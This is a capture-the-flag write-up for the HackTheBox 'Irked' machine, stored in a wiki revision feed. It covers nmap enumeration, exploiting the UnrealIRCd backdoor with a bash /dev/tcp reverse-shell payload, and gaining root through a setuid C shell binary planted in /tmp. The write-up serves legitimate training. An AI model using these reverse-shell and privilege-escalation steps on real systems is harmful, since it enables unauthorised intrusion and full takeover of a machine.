https://book.ghanim.no/index.php?action=history&feed=atom&title=Write-ups%2FHTB%2FIrkedWrite-ups/HTB/Irked - Revision history2026-04-21T16:26:01ZRevision history for this page on the wikiMediaWiki 1.45.1https://book.ghanim.no/index.php?title=Write-ups/HTB/Irked&diff=1172&oldid=previmported>Aghanim at 20:42, 4 January 20222022-01-04T20:42:54Z<p></p>
<p><b>New page</b></p><div>{{Infobox WriteUp<br />
| name = Irked<br />
| platform = HackTheBox<br />
| os = Linux<br />
| difficulty = Easy<br />
| techniques = IRC, UnrealIRCd Backdoor<br />
}}<br />
<br />
[[File:2022-01-image-78.png|thumb]]<br />
<br />
<br />
Another Linux box from TJ_nulls OSCP prep. This was was pretty interesting box with an attack vector I have not yet seen before. This is a pretty straight forward box, with no trickery. You can use metasploit to get initial access, but as I've stated earlier I will refrain from using metasploit.<br />
<br />
<br />
''Edit: After looking at IPPSEC's walkthrough video I noticed that I missed some steps. Even though I got root access to this machine, there was a steg in the photo on the webserver. In djmardovs folders there was a .backup file with a hint pointing to steg. Djmardovs password was in the photo. You could now SSH in to his account. ''<br />
<br />
<br />
----<br />
<br />
<br />
== Enumeration ==<br />
<br />
<br />
I ran the usual NMAP scans. There were many open ports on this box, but the most interesing ports were '''6697 '''and '''8067''' with the service '''IRC '''running on them.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
┌─[root@parrotos]─[/home/aghanim/Desktop/HTB/irked]<br />
└──╼ #nmap -sV -sC -A -p- --min-rate 10000 10.10.10.117 -oN nmap.result<br />
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-03 20:48 GMT<br />
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan<br />
SYN Stealth Scan Timing: About 99.99% done; ETC: 20:51 (0:00:00 remaining)<br />
Warning: 10.10.10.117 giving up on port because retransmission cap hit (10).<br />
Nmap scan report for 10.10.10.117<br />
Host is up (0.043s latency).<br />
Not shown: 65522 closed tcp ports (reset)<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)<br />
| ssh-hostkey:<br />
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)<br />
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)<br />
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)<br />
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)<br />
80/tcp open http Apache httpd 2.4.10 ((Debian))<br />
|_http-title: Site doesnt have a title (text/html).<br />
|_http-server-header: Apache/2.4.10 (Debian)<br />
111/tcp open rpcbind 2-4 (RPC #100000)<br />
| rpcinfo:<br />
| program version port/proto service<br />
| 100000 2,3,4 111/tcp rpcbind<br />
| 100000 2,3,4 111/udp rpcbind<br />
| 100000 3,4 111/tcp6 rpcbind<br />
| 100000 3,4 111/udp6 rpcbind<br />
| 100024 1 35586/tcp6 status<br />
| 100024 1 44788/tcp status<br />
| 100024 1 47670/udp status<br />
|_ 100024 1 54828/udp6 status<br />
2488/tcp filtered moy-corp<br />
6697/tcp open irc UnrealIRCd<br />
8067/tcp open irc UnrealIRCd<br />
15636/tcp filtered unknown<br />
16471/tcp filtered unknown<br />
27107/tcp filtered unknown<br />
44788/tcp open status 1 (RPC #100024)<br />
47072/tcp filtered unknown<br />
60340/tcp filtered unknown<br />
65534/tcp open irc UnrealIRCd<br />
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).<br />
TCP/IP fingerprint:<br />
OS:SCAN(V=7.92%E=4%D=1/3%OT=22%CT=1%CU=36187%PV=Y%DS=2%DC=T%G=Y%TM=61D3621E<br />
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)SEQ(<br />
OS:SP=107%GCD=1%ISR=10A%TI=Z%CI=I%TS=8)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3<br />
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7<br />
OS:120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW<br />
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF<br />
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=<br />
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=<br />
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI<br />
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)<br />
<br />
Network Distance: 2 hops<br />
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel<br />
<br />
TRACEROUTE (using port 8080/tcp)<br />
HOP RTT ADDRESS<br />
1 38.30 ms 10.10.14.1<br />
2 38.53 ms 10.10.10.117<br />
<br />
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 228.62 seconds<br />
</syntaxhighlight><br />
<br />
<br />
A quick google search and I find that there is a backdoor vulnerability in '''UnrealIRCd''' which I can use to exploit and get initial access to the box.<br />
<br />
<br />
== Initial Access ==<br />
<br />
<br />
To get initial access I will use[https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py Ranger11Danger's] python script. The payload in the script is<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
s.sendall((f'AB; {gen_payload(python_payload)} \n').encode())<br />
</syntaxhighlight><br />
<br />
<br />
which sends the character '''AB''', the '''payload''', and then a '''newline''' command. The payload here will be a reverse shell. '''<code>bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1'</code>'''.<br />
<br />
<br />
Start a netcat listener on your attacking machine and run the script with the command<br />
<br />
<br />
python3 exploit.py -payload bash target_ip target_port<br />
<br />
</pre><br />
<br />
<br />
It didnt work the first couple of times, so I had to run it multiple times for it to work. I got '''shell '''with the user '''ircd'''.<br />
<br />
<br />
I couldt read the '''user.txt''' since it was owned by another user named '''djmardov. '''<br />
<br />
<br />
== Root ==<br />
<br />
<br />
Rooting this box was kinda similar to the box '''lame''', with abusing files with SUID bits. Listing all the files with SUID bit using this command<code> '''find / -type f -perm -04000 -ls 2>/dev/null'''</code> we get a list of files.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
404330 356 -rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper<br />
394848 12 -rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device<br />
412270 16 -rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1<br />
410047 552 -rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign<br />
408970 16 -rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper<br />
409724 1060 -rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4<br />
424276 332 -rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd<br />
394369 44 -rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh<br />
410065 96 -rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail<br />
394371 80 -rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd<br />
393000 40 -rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp<br />
409644 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at<br />
412272 20 -rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec<br />
424835 12 -rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X<br />
394373 52 -rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd<br />
394368 52 -rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn<br />
1062682 8 -rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser<br />
914060 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs<br />
783487 40 -rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su<br />
783401 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount<br />
792821 36 -rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount<br />
792836 160 -rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g<br />
783402 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount<br />
</syntaxhighlight><br />
<br />
<br />
The one file that struck out was '''viewuser''', which is not a known binary. Taking a closer look at the binary we find that it is calling on a nother binary '''/tmp/listusers. '''<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220104210816.png|thumb]]<br />
<br />
<br />
So in the '''tmp '''folder we create a '''listusers '''binary, which when we run '''/bin/viewuser''' will be called by the binary.<br />
<br />
<br />
<syntaxhighlight lang="bash"><br />
ircd@irked:/tmp$ cat listusers.c<br />
int main(int argc, char **argv) {<br />
setuid(0);<br />
system("/bin/sh -i");<br />
# The -i makes the shell interactive.<br />
return 0;<br />
}<br />
ircd@irked:/tmp$ gcc listusers.c -o listusers<br />
</syntaxhighlight><br />
<br />
<br />
So what this binary does is setting our '''UID''' to '''0 '''(root), the running the command '''/bin/sh''' with''' -i '''(interactive) parameter. We then compile it with '''gcc '''and run '''viewuser'''.<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220104211008.png|thumb]]<br />
<br />
<br />
As you can see, we are now '''root''' and can read both the '''user.txt '''and '''root.txt'''. Interesting enough the password to '''djmardov''''s user was in the '''root '''directory.<br />
<br />
<br />
[[File:2022-01-Pasted-image-20220104211050.png|thumb]]<br />
<br />
[[Category:HackTheBox]]<br />
[[Category:Linux]]<br />
[[Category:Write-ups]]</div>imported>Aghanim